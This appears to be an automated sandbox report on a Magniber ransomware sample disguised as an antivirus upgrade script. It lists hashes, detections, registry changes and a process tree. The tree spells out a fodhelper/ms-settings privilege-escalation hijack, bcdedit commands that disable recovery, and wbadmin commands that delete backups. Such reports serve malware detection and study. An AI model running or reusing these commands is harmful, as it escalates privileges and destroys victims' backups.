Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
08-09-2022 05:30
Static task
static1
Behavioral task
behavioral1
Sample
Antivirus_Upgrade_Cloud.8a6cd22d83c0486.jse
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Antivirus_Upgrade_Cloud.8a6cd22d83c0486.jse
Resource
win10v2004-20220812-en
General
-
Target
Antivirus_Upgrade_Cloud.8a6cd22d83c0486.jse
-
Size
167KB
-
MD5
a1f5a11ee4b1ae01ea986311bdc9a840
-
SHA1
0aacc589c57adba17786cbfa4446e6ce1ae48d2e
-
SHA256
bba85d79db69db1b638e24e0a426ccccdc5c95875b8c3a26aa959cce3f6c8575
-
SHA512
ce8db2d1da1f446df13ac6bc12a76d78b5578f787e0b24dccca4ebc7bb941e5d27336321c6338957fc198e92669345d95298b3fbaeca6e604666ee44d5f108f9
-
SSDEEP
3072:fHsGPsk+UsSlORiat8x8S4k1sZa7GGCcxaeQR3ReRw/H3MrqW25pf5w2D:fPsk+UjlOR1t8n1sGVCcxbQm28O5wo
Malware Config
Signatures
-
Detect magniber ransomware 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1108-134-0x0000029800000000-0x0000029801000000-memory.dmp family_magniber behavioral2/memory/2376-135-0x000001D9B6FA0000-0x000001D9B6FAA000-memory.dmp family_magniber behavioral2/memory/1108-148-0x0000029800000000-0x0000029801000000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bcdedit.exebcdedit.exewbadmin.exewbadmin.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4632 4924 bcdedit.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3680 4924 bcdedit.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1940 4924 wbadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1708 4924 wbadmin.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4632 bcdedit.exe 3680 bcdedit.exe -
Processes:
wbadmin.exepid process 1708 wbadmin.exe -
Processes:
wbadmin.exepid process 1940 wbadmin.exe -
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Explorer.EXEdescription ioc process File renamed C:\Users\Admin\Pictures\InstallResume.png => C:\Users\Admin\Pictures\InstallResume.png.uvxffmn Explorer.EXE File renamed C:\Users\Admin\Pictures\OptimizeExpand.png => C:\Users\Admin\Pictures\OptimizeExpand.png.uvxffmn Explorer.EXE File renamed C:\Users\Admin\Pictures\UninstallUse.tif => C:\Users\Admin\Pictures\UninstallUse.tif.uvxffmn Explorer.EXE -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4812 3244 WerFault.exe DllHost.exe -
Modifies registry class 56 IoCs
Processes:
Explorer.EXEsvchost.exeRuntimeBroker.exeRuntimeBroker.exesvchost.exeRuntimeBroker.exetaskhostw.exesihost.exeRuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/rqgksfsx.jfif" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/rregoibm.jfif" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute svchost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/supfsegva.jfif" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" Explorer.EXE Key deleted \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\63e979ee-9dc3-4f57- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/dhlmrntwt.jfif" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings sihost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings Explorer.EXE Key deleted \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a5f92b30-0b56-44a5- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" sihost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f74278f1-e0fe-4868- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b6c2cb0-d888-4b7a- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key deleted \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3351c2b0-fe32-4ed6- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/unqevydzsve.jfif" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/qmknrplrbf.jfif" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/tesdos.jfif" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer svchost.exe Key deleted \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8e51787d-f33b-4885- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/qlvnlpjign.jfif" sihost.exe Key deleted \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cfc1c5c2-501c-4373- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/tetgqvohzaj.jfif" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer taskhostw.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
WScript.exepid process 1108 WScript.exe 1108 WScript.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2432 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXERuntimeBroker.exevssvc.exewbengine.exedescription pid process Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 3412 RuntimeBroker.exe Token: SeShutdownPrivilege 3412 RuntimeBroker.exe Token: SeShutdownPrivilege 3412 RuntimeBroker.exe Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 3412 RuntimeBroker.exe Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeBackupPrivilege 1812 vssvc.exe Token: SeRestorePrivilege 1812 vssvc.exe Token: SeAuditPrivilege 1812 vssvc.exe Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE Token: SeBackupPrivilege 5012 wbengine.exe Token: SeRestorePrivilege 5012 wbengine.exe Token: SeSecurityPrivilege 5012 wbengine.exe Token: SeShutdownPrivilege 2432 Explorer.EXE Token: SeCreatePagefilePrivilege 2432 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 2432 Explorer.EXE 2432 Explorer.EXE -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Explorer.EXEpid process 2432 Explorer.EXE -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
WScript.execmd.exefodhelper.execmd.execmd.exefodhelper.exefodhelper.execmd.exefodhelper.exedescription pid process target process PID 1108 wrote to memory of 2376 1108 WScript.exe sihost.exe PID 1108 wrote to memory of 2388 1108 WScript.exe svchost.exe PID 1108 wrote to memory of 2628 1108 WScript.exe taskhostw.exe PID 1108 wrote to memory of 2432 1108 WScript.exe Explorer.EXE PID 1108 wrote to memory of 760 1108 WScript.exe svchost.exe PID 1108 wrote to memory of 3244 1108 WScript.exe DllHost.exe PID 1108 wrote to memory of 3348 1108 WScript.exe StartMenuExperienceHost.exe PID 1108 wrote to memory of 3412 1108 WScript.exe RuntimeBroker.exe PID 1108 wrote to memory of 3544 1108 WScript.exe SearchApp.exe PID 1108 wrote to memory of 3896 1108 WScript.exe RuntimeBroker.exe PID 1108 wrote to memory of 4776 1108 WScript.exe RuntimeBroker.exe PID 1108 wrote to memory of 1772 1108 WScript.exe RuntimeBroker.exe PID 1108 wrote to memory of 5012 1108 WScript.exe backgroundTaskHost.exe PID 1108 wrote to memory of 3680 1108 WScript.exe backgroundTaskHost.exe PID 4492 wrote to memory of 4628 4492 cmd.exe fodhelper.exe PID 4492 wrote to memory of 4628 4492 cmd.exe fodhelper.exe PID 4628 wrote to memory of 4488 4628 fodhelper.exe wscript.exe PID 4628 wrote to memory of 4488 4628 fodhelper.exe wscript.exe PID 3716 wrote to memory of 3752 3716 cmd.exe fodhelper.exe PID 3716 wrote to memory of 3752 3716 cmd.exe fodhelper.exe PID 3756 wrote to memory of 3084 3756 cmd.exe fodhelper.exe PID 3756 wrote to memory of 3084 3756 cmd.exe fodhelper.exe PID 3752 wrote to memory of 2060 3752 fodhelper.exe wscript.exe PID 3752 wrote to memory of 2060 3752 fodhelper.exe wscript.exe PID 3084 wrote to memory of 3624 3084 fodhelper.exe wscript.exe PID 3084 wrote to memory of 3624 3084 fodhelper.exe wscript.exe PID 1752 wrote to memory of 764 1752 cmd.exe fodhelper.exe PID 1752 wrote to memory of 764 1752 cmd.exe fodhelper.exe PID 764 wrote to memory of 1356 764 fodhelper.exe wscript.exe PID 764 wrote to memory of 1356 764 fodhelper.exe wscript.exe
Processes
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:3680
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca1⤵PID:5012
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:1772
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:4776
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3896 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/rqgksfsx.jfif4⤵PID:2060
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3544
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3412 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/rqgksfsx.jfif4⤵PID:3624
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3348
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3244
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3244 -s 9002⤵
- Program crash
PID:4812
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
- Modifies registry class
PID:760
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2432 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Antivirus_Upgrade_Cloud.8a6cd22d83c0486.jse"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1108
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Modifies registry class
PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Modifies registry class
PID:2388 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/rqgksfsx.jfif4⤵PID:1356
-
-
-
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
PID:2376 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/supfsegva.jfif4⤵PID:4488
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 3244 -ip 32441⤵PID:2948
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4632
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3680
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:1940
-
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:1708
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1920
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:4312
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
876B
MD542efa7eac4c01a7ad942e23cafff35f6
SHA198c779c17c882d831fb24d43b6ddf2d1f2cb168f
SHA256b0ff6c7ef7c2fd4a9037620d0e56e276480b9e2bf2b0bc44c878182adf3dbdc3
SHA512b41b2cd6fe388ebf65aab8ec7b5b532a5dea73165741e17a016f63d7b6e136b4a67f10133f6cb9b44f4737cfaccc9d4f1239da7e9ac0caf5e9daf750a3612580